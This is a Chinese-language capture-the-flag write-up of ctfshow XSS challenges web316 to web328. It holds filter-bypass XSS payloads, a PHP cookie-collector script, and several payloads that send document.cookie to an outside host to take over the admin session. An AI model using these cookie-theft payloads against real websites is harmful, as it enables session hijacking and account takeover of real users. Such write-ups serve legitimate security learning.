ctfshow XSS刷题总结

简介

这次把爪牙伸到了xss 嘿嘿嘿
开始日咯!

web316

用xss平台怎么也爆不出。。。
可能是姿势不对
用最原始的方法吧
在自己的服务器上写一个hack.php


$content = $_GET[1];
if(isset($content)){
    file_put_contents('XSS/flag.txt',$content);
}else{
    echo 'no date input';
}

下边拿到后直接把cookie转发


web317

今天学习了一款xss自动扫描的工具 XSStrike
ctfshow XSS刷题总结_第1张图片
似乎很好用的呢
直接跑出了payload 随便拉一个来看一下
额 。。。好像没看懂

<hTmL/+/OnmousEover%0d=%0d[8].find(confirm)%0dx//

还是先自己来 慢慢来 从简单的来试


直接弹出


额。。。
不行 不造为啥
貌似是图片后台不会点击。。。

web318,319

利用body标签

由于这种攻击方法向量,在给定页面中只有一个body标签,有些人可能认为它不起作用,但实际上,所有浏览器都会把它当事件处理器(Event Handler)来执行。在这里,可以在onpageshow事件中用提交body元素的方法,形成XSS Payload,当其中的body元素被解析后就会触发Payload

payload


web320

上一个被ban了
试试别的 开始变难哩
虽然用工具不太好 但是(真到好用

<HTml%0doNpOinTEreNteR%0d=%0dalert(1)>
<HTml%0doNpOinTEreNteR%0d=%0dwindow.location.href='http://wgm1yk1.nat.ipyingshe.com/hack.php?1='+document.cookie>

web321

这里随便选择了 select 发现过滤了空格
直接用/绕过

<body/onload="window.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?cmd='+document.cookie"></body>

web322

还可以用

<body/onload="window.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?cmd='+document.cookie"></body>

web323~6

<video><source/**/onerror=alert(1)>
<video><source/**/onerror="window.location.href='http://xxxxx.com/x.php?cmd='+document.cookie">

web327

收件人必须为admin
在留言板插 随便插

web328

<script>window.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?cmd='+document.cookie</script>

看了群主视频 学习了
思路:
看到自己能看到这个页面
ctfshow XSS刷题总结_第2张图片

管理员也能看到
于是在用户名和密码之中x
x完后可得到管理员cookie

中间有两个包 都可以改cookie 但第二个包更重要一点
改完后可得到flag

你可能感兴趣的:(CTF)